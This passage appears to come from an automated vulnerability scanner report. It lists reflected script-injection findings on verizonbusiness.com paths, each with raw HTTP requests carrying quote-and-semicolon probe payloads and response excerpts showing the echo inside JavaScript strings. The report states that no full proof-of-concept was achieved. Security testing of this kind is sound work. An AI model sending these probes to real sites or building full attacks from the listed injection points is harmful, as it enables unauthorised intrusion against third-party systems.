Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41609
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/us/solutions21c4b";d72783d0bad/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.1127. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb104'%3bd264d24ebd8 was submitted in the REST URL parameter 3. This input was echoed as fb104';d264d24ebd8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/solutions/varfb104'%3bd264d24ebd8/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:55:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42821
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/us/solutions/varfb104';d264d24ebd8/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1128. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4420f"%3bfbbedaba720 was submitted in the REST URL parameter 3. This input was echoed as 4420f";fbbedaba720 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/solutions/var4420f"%3bfbbedaba720/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:03 GMT
Content-Type: text/html
Content-Length: 42821
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/us/solutions/var4420f";fbbedaba720/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1129. http://www.verizonbusiness.com/us/support/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/support/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8689'%3ba48c3b28e32 was submitted in the REST URL parameter 1. This input was echoed as a8689';a48c3b28e32 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usa8689'%3ba48c3b28e32/support/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40629
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/usa8689';a48c3b28e32/support/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1130. http://www.verizonbusiness.com/us/support/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/support/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 309dd"%3bb44e908e47e was submitted in the REST URL parameter 1. This input was echoed as 309dd";b44e908e47e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us309dd"%3bb44e908e47e/support/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40629
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/us309dd";b44e908e47e/support/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.1131. http://www.verizonbusiness.com/us/support/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/support/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec8a0'%3b8df033978ef was submitted in the REST URL parameter 2. This input was echoed as ec8a0';8df033978ef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/supportec8a0'%3b8df033978ef/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41599
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/us/supportec8a0';8df033978ef/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1132. http://www.verizonbusiness.com/us/support/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/support/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a47ff"%3b26b7c2d468a was submitted in the REST URL parameter 2. This input was echoed as a47ff";26b7c2d468a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/supporta47ff"%3b26b7c2d468a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:02 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41597
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/us/supporta47ff";26b7c2d468a/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1133. http://www.verizonbusiness.com/ve/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ve/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89282'%3bbca35e56ebc was submitted in the REST URL parameter 1. This input was echoed as 89282';bca35e56ebc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ve89282'%3bbca35e56ebc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:15 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47571
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/ve89282';bca35e56ebc/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1134. http://www.verizonbusiness.com/ve/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ve/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b50ce"%3bf5fbc0d529f was submitted in the REST URL parameter 1. This input was echoed as b50ce";f5fbc0d529f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /veb50ce"%3bf5fbc0d529f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:51 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47573
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Esta página no existe";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/veb50ce";f5fbc0d529f/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1135. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6eda'%3bb0caee58f37 was submitted in the REST URL parameter 1. This input was echoed as a6eda';b0caee58f37 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwidea6eda'%3bb0caee58f37/resources/media/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:02 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40708
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwidea6eda';b0caee58f37/resources/media/index-131046-wifi+shopping+borders.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1136. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3b2a"%3b02fede176e7 was submitted in the REST URL parameter 1. This input was echoed as e3b2a";02fede176e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwidee3b2a"%3b02fede176e7/resources/media/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40708
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwidee3b2a";02fede176e7/resources/media/index-131046-wifi+shopping+borders.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FO
...[SNIP]...

1.1137. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea866"%3b0520771f409 was submitted in the REST URL parameter 2. This input was echoed as ea866";0520771f409 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resourcesea866"%3b0520771f409/media/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40710
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resourcesea866";0520771f409/media/index-131046-wifi+shopping+borders.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDAT
...[SNIP]...

1.1138. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c774d'%3bf4b70559c43 was submitted in the REST URL parameter 2. This input was echoed as c774d';f4b70559c43 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resourcesc774d'%3bf4b70559c43/media/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40708
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resourcesc774d';f4b70559c43/media/index-131046-wifi+shopping+borders.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1139. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42c67'%3b24e3ecd4da4 was submitted in the REST URL parameter 3. This input was echoed as 42c67';24e3ecd4da4 in the application's response.

